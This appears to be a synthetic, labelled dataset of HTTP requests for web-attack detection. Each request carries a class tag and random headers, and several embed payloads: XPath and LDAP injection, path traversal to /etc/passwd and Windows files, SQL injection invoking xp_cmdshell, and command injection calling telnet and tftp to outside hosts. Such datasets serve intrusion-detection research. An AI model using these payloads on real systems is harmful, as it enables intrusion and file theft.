TE: gzip;q=0.1,trailers,trailers
Trailer: If-Range
User-Agent: oorvthc (sMU2zstHs)
UA-Disp: 9694,0941,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0833x5233
Via: 3.5 www.tatnEwtd.gif, oHYAai/3.1 www.4voase.tiff, 5.5 www.InIhmi.png
Transfer-Encoding: compress
Upgrade: nw3/1.2, Eccue/9.3, dnaeM/4.7, yeug/4.3
Warning: 376 www.tr4on.jpeg "m7aaREuTTovptbolar" 
X-Forwarded-For: 251.96.98.120
X-Serial-Number: 340888141293
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9FPqlZT12RxP=tOb&xcueimsskstli3p=t~nttss&irxg=96206&Ay=r0e

End - Id: 48201
Start - Id: 49535
class: XPathInjection
GET /bR39c3jEPn-K4h/lY-4IU0_w83s4hf-Hf0/aa8pAF65-_-DyXf/Mi_7dVGyr/anrh.css?3samK0P8874wgetpP=0n.K&kdocumentNMMdocument=68&ktbqcAral=4349216881&sEoeeamiwfeM=69+eidp%29ilikeiopenr&set=lG1dB1&ti4iSt=u+%3Ce&nm=3904587&Sh0ghat=lRers&oq74drN=t8hN1&o76T2iaoee=ufhwi%2Fld%2Ffni%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D88%5D+++or+%27aTh%27+%3D++++%27&6U3Ao4ayXoMA=7256588&utbfhnrimtodst=dsUCJ6.h&trlerran8rjfmh=87 HTTP/1.1
Host: www.1rnEuTDn.com
Connection: heeHtmsa
Accept: audio/x-wav;q=0.6, audio/*;q=0.8, application/*
Accept-Charset: cp-932;q=0.5, iso-8859-2, x-mac-roman;q=0.1, iso-8859-2;q=0.2, iso-8859-4
Accept-Encoding: *
Accept-Language: upel-k, col-seate, tnkA3fh-rH6simEe
Cache-Control: no-transform
Client-ip: 91.134.19.242
Cookie: altn4Srme8JWo=20487;9XZSaxgwinnt=Etmp1hg;6f1haerd=4535195;rzsacXeyna=oftmheat
Cookie2: $Version="18"
Date: Thu, 01 Feb 07 24:58:03 CET
ETag: W/"KtLgebekwR@UKJq0g"
Expect: edehn3bs=oglslt
From: n6so@lthuy7i.ch
If-Modified-Since: Wed, 19 Aug 09 02:10:03 GMT
If-Unmodified-Since: Sun, 09 Nov 08 15:13:22 GMT
If-Match: "rZAp-iTTM8z64R-D"
If-None-Match: *
If-Range: *
Max-Forwards: 2819
MIME-Version: 4.9
Pragma: eMerdn='mn'
Proxy-Authorization: ae9cy3 mcawsh6=6imqoMWi
Authorization: Digest opaque="rOd5sl"
Range: 121-,-5
Referer: /biahiers.rar
TE: chunked;q=0.8,trailers,deflate;q=0.1
Trailer: Connection
User-Agent: nSsritetto79is
UA-CPU: x86
UA-Disp: 2924,8513,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 661x844
Via: FTP/8.1 www.4nqipht.js
Transfer-Encoding: identity
Upgrade: 7o6mn6/1.4, twjeP/1.1, eevzn/6.2
Warning: 066 177.133.141.195 "uvomreyngrucmsS" "Mon, 08 Mar 10 06:12:12 GMT"
X-Forwarded-For: 224.66.157.216
X-Serial-Number: 1653383151363869
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49535
Start - Id: 49977
class: XPathInjection
GET /hiansrn/oilndrbf/sm96cC/awYcSuz/auacarkoeltli6a/o9to79jm9fEdrkp/yWlocationV-2PRnN8W-/eWILF3y6eEyUfaTxaxP/blte.htm?Ugm7wit1nO=tCje&Alarltat=3&Ea2yapsorajElf=t1syaortanxnltw&nibeea=t+igsibe&EBVVformXGoz=Rdtm%3Beee&srkocDoiswaasyt=%28i+++++%3C++count%28a2%2Fchild%3A%3Atext%28%29%29+and+++j+++++%3C+count%28Roat%2Fchild%3A%3Acomment%28%29%29++++and++k++%3C++count%28thn3ed%2Fchild%3A%3A*%29++++%29 HTTP/1.1
Host: www.weqTnm2A.be
Connection: oqiC
Accept: */*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: is-xohsw;q=0.9, eEsaUNru-osuh0al
Cache-Control: only-if-cached
Client-ip: 81.12.210.157
Cookie2: $Version="372"
Date: Mon, 30 Jan 06 18:13:45 GMT
ETag: W/"j_9d8nENb2Gi6G5"
Expect: etuerprO
From: aihryej@wvtazei.be
If-Modified-Since: Fri, 06 Oct 06 02:54:24 CET
If-Unmodified-Since: Mon, 26 Nov 07 24:19:13 UTC
If-Match: "DqBOL3pOC_4w6kJu6Im"
If-None-Match: "PT36GUOPQk51Vqp"
If-Range: Tue, 13 Mar 07 14:25:03 UTC
Max-Forwards: 82
MIME-Version: 0.0
Pragma: tnemtq=7sit
Proxy-Authorization: Digest response="CC5E7EdEafE81B3DBCeA5a5BbFE19b80"
Authorization: Basic c2huZTp1bWl0OG8z
Range: 30900-
Referer: http://www.qeafH.biz/lusecbw/eejp/euris5ii/ttnls.txt
TE: trailers,trailers
Trailer: If-Match
User-Agent: elrrmts/2.4
UA-CPU: 68000
UA-Disp: 229,130,32
UA-OS: Linux
Via: 9xss/2.8 www.eteYr.png, evto/4.1 www.nqdee.jpg
Transfer-Encoding: identity
Warning: 373 www.dycegetI.js "ud0n" "Sun, 04 May 08 18:18:10 CET"
X-Forwarded-For: 10.220.189.114
X-Serial-Number: 6790519632
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49977
Start - Id: 46048
class: PathTransversal
GET /cxi5VgYoRzh2-/lD_6/l9kaqWV/sY/zdIenioees3xenqsUe/zcbntb/xmlqDEO_olocationcz.html?Re=s8ho&bu=98443&YrvLRrQselectN8s=0dtost HTTP/1.0
Host: 194.230.255.71
Connection: book
Accept: application/postscript, image/*;q=0.7
Accept-Charset: *
Accept-Language: snteair-ih9, 3i-ghENld;q=0.7, ie-hr
Cookie: cohih=\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html;HkJQtq@BxCr=naOtaeasslb;havingoDMiupdatev9mC3=fexH3Ianaleaoaryaa
Cookie2: $Version="931"
Date: Fri, 20 Aug 04 12:55:48 UTC
Expect: 100-continue
If-Modified-Since: Tue, 04 May 04 12:08:22 GMT
If-Match: *
If-None-Match: "RYsPirAhcgKMoXNFZDZ"
If-Range: Thu, 03 Nov 05 24:09:17 CET
Max-Forwards: 8
Pragma: no-cache
Referer: http://www.slesRs.biz/7obnrDmr/9dtmrror/enRai/dtfea.jpeg
TE: chunked,gzip
User-Agent: Mozilla/8.7 (Machintosh; U; PPC 2.6; z9-ii; rv:6.5.7) Gecko/08620744
UA-Color: color32
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46048
Start - Id: 41658
class: SqlInjection
GET /oWN83rilzPXUn_0/os/hYDy8Y6gxmHhl0j/isnbsgbateiEhciSrR9c/Iomul/VX_@d@lq5p6stdinH/71fnoi59de/Fpvbscript6EQy.7/41eyyslRDxL2yUjBs/rcsehkmSWSrdElf/NrsrThanne/rNcoVxIQHZPiwj.mspx?uxaeopnM7l=OR++++%27dbl%27++BETWEEN++%27R%27+++++AND++++%27T%27&aslnAfwperr4=coiN%3A&0igyqop=hufhilmne&9w9VpuJF6location=mwgetS&eFdtg=i9auetn&nOy=65&ie6oeraalmuacOi=lQir&9fhe2afDieu=80189 HTTP/1.0
Host: www.cpNn4.cz
Connection: yned
Accept: */*;q=0.5
Accept-Charset: big5, iso-8859-2
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: max-age=8
Client-ip: 70.252.115.133
Cookie: z_36E4Q=irl~oeiu0o]htfxr phpp;tp=8027
Cookie2: $Version="72"
Date: Sat, 16 Feb 08 09:53:33 UTC
ETag: W/"tK08tBHPggtEMtZ1I-o"
Expect: tdqm
From: oseas@soacs.biz
If-Modified-Since: Fri, 13 May 05 09:37:10 GMT
If-Unmodified-Since: Fri, 29 Apr 05 07:06:37 GMT
If-Match: *
If-None-Match: *
If-Range: "kUR6PynGPM1Y0p4Tg"
Max-Forwards: 610
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: ewnBd ycpeari1=oiYepi
Authorization: ebDoe1 e2o6goee=Atbb0aec
Range: 0-,-4,4860-288700
Referer: http://www.b9sndeer.org/ahiHus/7x4e/tinvres/eton.asmx
TE: deflate,gzip;q=0.4,chunked
Trailer: If-Range
User-Agent: na2n9e (rpJrCACaI)
UA-CPU: MIPS
UA-Disp: 627,8726,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 232x3893
Via: FTP/0.4 www.stgRwi5.png:3938, FTP/8.8 218.220.4.225:8135, FTP/0.0 183.219.30.169
Transfer-Encoding: compress
Upgrade: eelO/2.0, utnt/9.3, aSn/6.5
Warning: 553 www.mekn.jpg "dieiIfit2dki8e" 
X-Forwarded-For: 236.249.18.77
X-Serial-Number: 611965021882313
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41658
Start - Id: 35969
class: PathTransversal
GET /6thcGTBssnD/hyD9aDbinqBNPSo/doieahlher/h@YTOqRnO-YXxiy1pu1/eE0Wq9zZ.png? HTTP/1.1
Host: 253.38.120.96
Connection: keep-alive
Accept: audio/*, video/mpeg;q=0.8
Accept-Charset: windows-1255, windows-874, windows-1255;q=0.3
Accept-Encoding: *;q=0.3
Accept-Language: e-s;q=0.3, iWop-zy, rAswe-ggia8ge;q=0.1, esnRt5-o4to8, tOioua-4oA;q=0.1
Cache-Control: no-transform
Client-ip: 13.45.88.198
Cookie: emctrey=6275220159;tbcdha7e5eWsv3r=ueluOtc;hnpu=../../../../../../WINDOWS/autoexec.bat;cofeaseie=8262305;usrOWbG=alibs3ejlaI O=pv;Qo5fqtugoE7dseE=oeo
Cookie2: $Version="784"
Date: Mon, 21 Jul 08 24:05:04 UTC
ETag: W/".z-2@ZfLD8wfVD2R5."
If-Unmodified-Since: Fri, 31 Mar 06 09:58:54 UTC
If-None-Match: *
Max-Forwards: 0752
MIME-Version: 8.5
Referer: http://www.cl20tlh.st/eoasisR/arteboa.txt
TE: chunked
Trailer: Accept
User-Agent: rSnaaa4nl/9.4.7.2.3
UA-OS: Win9x
----: ---------------------------

null

End - Id: 35969
Start - Id: 48707
class: XPathInjection
POST /jkIqU/tfhed5nEorgacksa/9iahedreeogeaocau.msf? HTTP/1.0
Content-Length: 316
Content-Language: w
Content-Encoding: identity
Content-Location: http://rnh3erx0.org/rii7loe/teNoytrd/0msaS0t/xuuneb.css
Content-MD5: dHNoZXNkSXJxaU9yc2lzYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Feb 07 23:01:33 UTC
Last-Modified: Sun, 04 Dec 05 21:01:35 CET
Host: www.4esyidn.cz:359
Connection: close
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.3, iso-2022-kr, windows-874;q=0.3, big5
Accept-Encoding: *;q=0.0
Accept-Language: eelihe-eiwtle5a;q=0.0, v-a1odbd, asoznle-te, M-z7Nc;q=0.5, qcitesY-blbddt;q=0.7
Cache-Control: ehuqpce=zsgon
Client-ip: 159.42.128.3
Cookie: huuae=bosexect;cat7rVha4=taem t6 T3;@Wx0c=~6techoleisucst0insertrIhttpsalr;Eorr= ie tshobhcV
Cookie2: $Version="372"
Date: Wed, 25 Jun 08 08:58:31 UTC
ETag: W/"jWpIYj1IsB1PwA."
Expect: drlso
From: Wquiz@fowi.gov
If-Modified-Since: Sun, 12 Mar 06 24:52:48 UTC
If-Unmodified-Since: Thu, 25 Sep 08 02:22:28 GMT
If-Match: "zklvf@qOWeyLm0WYHMHm"
If-None-Match: *
If-Range: Thu, 09 Jun 05 08:30:44 GMT
Max-Forwards: 264
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Tttob ruoutTbl=ttEyagpr
Authorization: NTLM aHo2cnQ4bW5ZcmVmNXJhZXVtb3NpY2V1U2xBaElsZWE=
Range: 522185-0,03103-
Referer: /crc5hhi.doc
TE: deflate;q=0.7,deflate;q=0.0,chunked
Trailer: Expect
User-Agent: Sutq0hbC (ol6w9IEdG)
UA-CPU: 68000
UA-Disp: 2550,506,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 640x9904
Via: 1.7 www.alytr.css
Transfer-Encoding: bosdns; n0slbsd=dhoziLes
Upgrade: phe/8.1, Jtnat/6.7
Warning: 956 www.8Oqk.shtml:3 "dhfeiV6ltr" 
X-Forwarded-For: 206.162.122.240
X-Serial-Number: 70312364698710750668
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

6bdltnsanane=tCMSFj&yerAlbvznsfejCl=p3GGk&9irpPseasahb=trsJC1d'    or     (i <   count(ls/child::text())   and  j     <  count(eldo/child::comment())   and k <    count(eslvdm/child::*)    )    or  'ti'    ='    i2' or&2rh0mmozoe6eoor=9016831&gatetsmt= bNi

End - Id: 48707
Start - Id: 43367
class: OsCommanding
GET /toanhqtxofaxua/Eeiiie84pcat/ETiHuttodrtu/emCeEdtssmWil/awkMq.XlwPQ.j9/igHUc_Jvg.huGRCVEl/yiuefyxam/eBkN6jYIzudUOi/ehGK@zBL/vst1hlt.sh?hteiseiiStn=%5Cviy%40sme%3Dri&bamaIfeap7uyw=o%25ai3t&estbz9riytt=+d4connecte9dleaec+e&spiE=%22++++%3B+++++telnet+++49.253.192.37+++80++%3B&insddeep=+e1jsneria&ytSoiiecr2=312 HTTP/1.0
Host: 158.180.65.119:62
Connection: close
Accept: text/plain
Accept-Charset: big5, us-ascii, iso-8859-3
Accept-Encoding: compress, identity, compress;q=0.5, identity;q=0.8, gzip;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 112.192.174.81
Cookie: amon7eFsvuuC=88;boErsvned=sew4ohnasa;oEcpfiosy=5;eEecbHo=aHig9rhnxe
Cookie2: $Version="7"
Date: Sun, 12 Aug 07 09:47:14 GMT
ETag: W/"MfQ3kG-@pCjXqY2jW"
Expect: grhrm
From: xrca@p4bIo.st
If-Modified-Since: Wed, 29 Mar 06 24:44:23 GMT
If-Unmodified-Since: Wed, 07 Feb 07 11:22:56 CET
If-Match: *
If-None-Match: "p2@jPP62BlQdFRMkN2"
If-Range: Tue, 11 Dec 07 17:46:42 GMT
Max-Forwards: 84
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic c3RvbzpFcHRvbG0=
Authorization: stt7m heees=nnhm3bi
Range: 9-
Referer: http://www.shsnie9A.com/ra2ae/aepHde/td3tokid.jsp
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/1.9 (Windows; U; Win 9x 1.6; th-tm; rv:1.1.3) Gecko/81811773
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 552x8251
Via: Mdbet/5.1 www.etmu0215.shtml, ntqa/8.9 www.nfhbmaL.png, 7.3 www.anty.css
Transfer-Encoding: compress
Upgrade: pnrl/2.2, znSce2/6.8
Warning: 782 www.e5rte.tiff:876 "07ituthT2yrwlHit1ah" "Sat, 29 Jul 06 07:27:58 CET"
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 68319129
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43367
Start - Id: 37112
class: LdapInjection
GET /nyscd0him/FZ_7LuIopassthrus.bin?6n=gtt%5C&connectVhxreplace6y=186716003&rhl=%3Die&Iozovtvnastr=xh7ywSagr&iain4t=6444&itlquceskwcIeai=haopttlftpnihtacces+cn%3A%2Fe9pm&ecHarlehyArf=ae4hnoqbtwyEehTxbR&mnialnanhd=b0BU4w&pi4s9lwebene=imp%29%28++%7C+%28rouao%3D*%29&QIi_Y=1 HTTP/1.0
Host: www.nhtottH.fr:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: trdt=toarbaed
Client-ip: 82.149.38.78
Cookie: atfeoadoscanna=4169735;3iuwoko5l=openent w\zo4t9u~Ur n );4duetdAiron=eFkyKzo;ePfromR_Da=uo;aia41p=a8Q4iR@kc
Cookie2: $Version="656"
Date: Sat, 25 Sep 04 07:20:01 CET
ETag: W/"qI2oENPhGRoQTyWi6-C"
Expect: 100-continue
From: ke6iat@otEmem.org
If-Modified-Since: Fri, 19 Jan 07 24:32:59 CET
If-Unmodified-Since: Sat, 10 Jan 04 22:19:28 CET
If-Match: "VBEceAVcNuOQC4ZRaVVf"
If-None-Match: "YaYrghb5gmtE5xvyi@P"
If-Range: "hSj..vl.bW0DN9X1qDQ8"
Max-Forwards: 4003
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic ZWVKbmI6ZGk1OHI=
Authorization: Digest response="22AF7033a49C83DF9fE5d8bDEc06BEe0"
Range: -12929,-403
Referer: /d4efleS/tesy2.gif
TE: trailers,trailers,chunked
Trailer: Accept-Language
User-Agent: Mozilla/6.2 (compatible; Konqueror/7.2; Open BSD i386; oPmewTstu; maesfusdl; ldmy4c)
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 617x3755
Via: e5szau/6.4 18.20.166.38, 2.7 59.35.105.170:87, FTP/5.3 www.tperrQln.jpeg:10500
Transfer-Encoding: compress
Upgrade: rPog/6.3, anziha/1.6, Aaolrp/4.1, ige/4.9, mu8/9.9
Warning: 296 92.253.127.230:14 "0shhdnca" "Sun, 22 Feb 04 22:26:45 CET"
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 4738976742686812
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37112
Start - Id: 38983
class: LdapInjection
GET /eec7.XmKh0mDpUnE/bYVLjcPNS-O3JF/lypt3emsniRtxkldjcy.tiff?57ejhf=rdcosol5pneSmme&n63dph3kas=5atencchild%5D&ELetcNI=%29+++%28%7C+%289snpu%3Delr*%29&NNlinkMKV=rFYY HTTP/1.0
Host: 38.86.84.182
Connection: close
Accept: image/jpeg;q=0.3, audio/*, text/html
Accept-Charset: windows-1258;q=0.9, iso-2022-jp;q=0.5, windows-1258;q=0.4
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 21.1.182.109
Cookie: nslr=sewt;OEe1Ka6NjyoY=r9sh-e1e';ikctrg8o=18224;deEHoacnsEeioas=25853
Cookie2: $Version="51"
Date: Thu, 08 Jan 09 06:29:49 CET
ETag: W/"aTH7ojAKF7GuLTnx"
Expect: 100-continue
From: hen1pimh@E3rhrtw1.uk
If-Modified-Since: Sat, 13 Nov 04 14:54:41 GMT
If-Unmodified-Since: Fri, 18 Sep 09 22:34:41 UTC
If-Match: "hw@g.aqbClKuNyUMz"
If-None-Match: "IXcidcWwp_F18ou8yanP"
If-Range: Fri, 11 Feb 05 18:57:49 UTC
Max-Forwards: 69
MIME-Version: 8.0
Pragma: r=datNtrb
Proxy-Authorization: Basic dlliYjpuaXNk
Authorization: Digest cnonce="rtli"
Range: 2-,-247703
Referer: http://www.5enNe.be/ieaouwa.aspx
TE: trailers,gzip;q=0.7
Trailer: Date
User-Agent: Mozilla/3.6 (Windows; U; WinNT 8.6; fe-eo; rv:9.6.1) Gecko/42472781
UA-CPU: MIPS
UA-OS: Windows 98
UA-Pixels: 8193x847
Via: j18a9a/0.1 37.144.199.88
Transfer-Encoding: deflate
Upgrade: rsS/8.2, 0dcoT/9.2, sO3bf/3.2, o6e/7.5
Warning: 291 www.9uop.js "voehitwHsNuovsder" "Mon, 25 Jan 10 10:06:46 CET"
X-Serial-Number: 95673
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 38983
Start - Id: 35973
class: PathTransversal
GET /vihurbeneeuou3ce/bor7A/gHRQ8shu5SlcwJ56.png?yR63T_m=ehh1 HTTP/1.0
Host: 39.61.15.191
Connection: tOlee
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: an-e;q=0.3, t-wefqQv;q=0.3, 6x-iebnn
Cache-Control: no-transform
Client-ip: 81.253.88.247
Cookie: o9mD3W0s=eqzYYgkLZW;le3nsnit=snti0iNyqdtnh;nirob1d3eayanqE=0ZSsxriSmi5djte;B4coaow6ndnT=thQU4;ieae=mzats"ri nsn"tshr>xdrop;eza1Lh=..\..\..\..\..\..\..\..\..\WINDOWS\system.ini
Cookie2: $Version="782"
Date: Fri, 05 Mar 04 02:46:54 GMT
ETag: "IIRgh_EUi@CN_xZxA."
Expect: 100-continue
From: 5rseieyn@tter6Ecal.org
If-Modified-Since: Fri, 20 Aug 04 23:41:47 UTC
If-Unmodified-Since: Sat, 24 Dec 05 09:51:08 UTC
If-Match: "R7UqPBg1YBRklr."
If-None-Match: "2UZMIkqmMA6f5qd3"
If-Range: Wed, 13 Jan 10 04:48:32 UTC
Max-Forwards: 7064
MIME-Version: 6.8
Pragma: no-cache
Authorization: opkp zinicEvz=1sido
Range: 61-,-511104
Referer: /nfihwsih/ovbHtoa.nsf
TE: chunked
Trailer: If-Match
User-Agent: Mozilla/8.6 (Windows; U; WinNT 4.4; 6l-0s; rv:3.1.4) Gecko/75501907
UA-CPU: Sparc
UA-OS: Linux
Via: 1.8 156.2.140.10:13398, HTTP/4.8 www.orzdkgec.jpg, HTTP/0.2 87.165.64.117
Transfer-Encoding: gzip
Upgrade: ajdo/2.1
Warning: 749 www.uineg7.png "lrbd6rasitteyhee7" 
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35973
Start - Id: 49599
class: XPathInjection
GET /i0NDSfLdTcLdLIvInJ4.png?ff6ZN2k.guEf=68699136&tTdo=deoct&kdijiho=+y&eDonMseayeet=91+++or++1%3C+p%2FvdYaXi%2Fie%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D168%5D+or+++7%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&4ixindemtbi=swhnyhsD&aaAr9=5855256 HTTP/1.1
Host: www.giozr.org
Connection: keep-alive
Accept: video/*;q=0.9, audio/*, application/x-tar
Accept-Charset: *
Accept-Encoding: 
Accept-Language: aitn-rsKsMlr, S-3cDo, 2nY5ms8-e;q=0.6, a-nuwdw
Cache-Control: no-store
Client-ip: 132.114.34.1
Cookie: FKmwk=n7ntar2sdoiwaE;fht1t=rcdeb8iI8hz;a8aqwrtn83dltti=annddrennkr;aioec=pcB;m36lluxgal8aeth=OoVN
Cookie2: $Version="785"
Date: Wed, 07 Apr 04 07:42:18 CET
ETag: "45E@hf2nml@00lw"
Expect: 100-continue
From: wiNgsai@oernriaeee.de
If-Modified-Since: Fri, 09 Nov 07 03:06:27 GMT
If-Unmodified-Since: Sat, 04 Sep 04 19:55:23 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 16 Aug 06 22:50:39 GMT
Max-Forwards: 01
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM c255bzF0ZndMd3liYThvZWlvb25QZWEzbnR6bG10cnR0ZA==
Authorization: Basic MGNudHNPZjphamF1
Range: 7852-
Referer: http://adncmaa.cz/0eDw8y/2dyclo7e/Enon.html
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/0.2 (Windows; U; Win98 1.3; df-ci; rv:9.9.2) Gecko/32482042
UA-CPU: StrongARM
UA-Disp: 1997,806,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 122x540
Via: HoeC/6.3 www.A2eafeb.png, 4.0 152.187.111.3
Transfer-Encoding: identity
Upgrade: iasi6m/1.5, ep9/4.9, ip9nui/4.5
Warning: 760 227.98.126.37 "nIw39hepCclatnett8" "Tue, 06 Nov 07 04:36:32 GMT"
X-Forwarded-For: 94.116.73.204
X-Serial-Number: 9696710
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49599
Start - Id: 41059
class: SqlInjection
GET /shnthldga85waijabhe/ohcaUIjBO.r5/hrcseetkirhqe/m@/2Gij2/gKqgrv1PnTWz/ietqNriie1ane/u41ZkyuOunvCautoexec/p1Ihfdl53MW4uWh.asmx?O3a=aoe&Osu8go1Cag=%27%3BEXEC+++++master.dbo.xp_cmdshell+++%27cmd.exe&eje6b9gdhaosom=ain&o4teu=nddnsoolT&qtsgN=netcaty&awahl=t639dLu0 HTTP/1.1
Host: 124.226.51.243
Connection: keep-alive
Accept: text/*;q=0.0, application/zip;q=0.5
Accept-Charset: iso-2022-jp;q=0.4, shift_jis;q=0.7, hz-gb-2312;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 111.62.79.6
Cookie: Aconnectd9a=2oon;ldsirLsoz=andai
Cookie2: $Version="635"
Date: Sun, 08 Nov 09 03:50:59 CET
ETag: "ZF70eBKRZsZqsOka"
Expect: anoat
From: 4a4Ax80@ieieio.ch
If-Modified-Since: Thu, 01 Mar 07 07:36:18 CET
If-Unmodified-Since: Sun, 24 Jan 10 08:14:12 CET
If-Match: "2jFZV3QegLglhlYfZr5"
If-None-Match: *
If-Range: Sat, 21 Apr 07 21:30:31 CET
Max-Forwards: 39
MIME-Version: 1.5
Pragma: mws=lp7mwti
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: Digest nc=EcCfCeEE
Range: 7-04,570-
Referer: http://ediSzwk.it/tsti/9ron/dhEuq/netroi.cgi
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/6.2 (X11; U; Solaris 7.1; rn-le; rv:2.2.1) Gecko/15059509
UA-CPU: PowerPC
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 967x915
Via: FTP/6.2 www.4eehn.js:05626, 4.6 94.209.235.135, 7.8 www.gdfi.htm
Transfer-Encoding: identity
Upgrade: 8y7ca/4.0, ennao/2.4, eme/1.0
Warning: 017 52.60.55.208:98691 "i7tTft" "Fri, 16 Jul 04 17:18:26 UTC"
X-Forwarded-For: 57.95.233.202
X-Serial-Number: 54708069609443708
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41059
Start - Id: 43509
class: OsCommanding
GET /lAfp5x/hxeoeooptpnlet/rssTne5itc7xwprs.tiff?rartbwlaunri=%291Marom9wherels&epvaeaerlaaIsTs=hrcpiza%3E&tl3ojeyte=liui&9NRsamL34YRX=iejimycyytaiesE&Mes0seSEeapfA5=%27++%3B+tftp++++-c+++get+++++www.isitreanor.com%3A%2Fataten.tar&eI2Nhwi=3&fnaassmitr=1290976&hdom=rqtewteoee HTTP/1.0
Host: www.iivislEu.de
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-1, x-mac-chinesesimp, cp-932;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=88
Client-ip: 108.184.195.217
Cookie: O2Kbodylwinnt-J5SA=2affa;l1ano=781;rn9undree0=0970613;Es=urmxstIecxNew;esret9=he=/;6a=nhn
Cookie2: $Version="916"
Date: Thu, 22 Apr 10 08:27:20 GMT
ETag: W/"CTMBNkc9JtBstBs"
Expect: 100-continue
From: e8soIts@reloee.st
If-Modified-Since: Sat, 30 Jan 10 12:13:26 CET
If-Unmodified-Since: Fri, 05 Mar 10 11:13:54 GMT
If-Match: "uXIX5BYxuGhu3CLf"
If-None-Match: "OWPEbrq5JcV7W5pNE."
If-Range: *
Max-Forwards: 7
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic bFJvZ25nOmVmVGNx
Authorization: NTLM aU5lZUl0M3NubGllc2ZlR2NsaXByaWxybWVybWVib3VPYXNsaW9Z
Range: 32-61,4386-85
Referer: /froPe4ur/clsrlk/rree/Erz7ota/zohf.cgi
TE: trailers,deflate;q=0.5,trailers
Trailer: Range
User-Agent: Mozilla/9.8 (Machintosh; U; PPC 6.1; nZ-ro; rv:4.9.1) Gecko/52163228
UA-CPU: MIPS
UA-Disp: 034,8508,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5281x2497
Via: 7.8 www.apz5po4E.css
Transfer-Encoding: compress
Upgrade: tlle/3.2, ouiu/2.7, 6nb/4.0, iuoaC/4.5, ioatma/4.1
Warning: 156 193.81.211.74 "9aeu3wesnnaer" 
X-Forwarded-For: 134.201.54.76
X-Serial-Number: 521013041943
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43509
Start - Id: 44352
class: OsCommanding
GET /ssi/envout.bat?|dir%20..............1 HTTP/1.0
Host: www.itha85.gov
Connection: qc6nhah
Accept: */*;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: compress;q=0.4
Accept-Language: *;q=0.3
Cache-Control: max-stale=5
Client-ip: 253.153.154.72
Cookie: isvhnienixoN8to=eGJZ_Ghj;Tisnlm=012323
Cookie2: $Version="2"
Date: Sat, 07 Aug 04 19:05:41 UTC
ETag: "EeqXjCS5PORBp-bwP8v4"
Expect: 100-continue
From: oehrc@o8se.com
If-Modified-Since: Sun, 29 Jun 08 22:25:59 UTC
If-Unmodified-Since: Fri, 01 Dec 06 03:19:01 UTC
If-Match: "GJMFDmKTB_d_BJ8FQB"
If-None-Match: *
If-Range: "Om_ZesJafUZ9OevCH"
Max-Forwards: 40
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: iHauOk iIeethi7=3ndhh
Authorization: hsx0 lNsoa=bsAoso
Range: -601,-24981
Referer: /ufFiiud1/iIh4wo/dHrr.jsp
TE: gzip;q=0.8
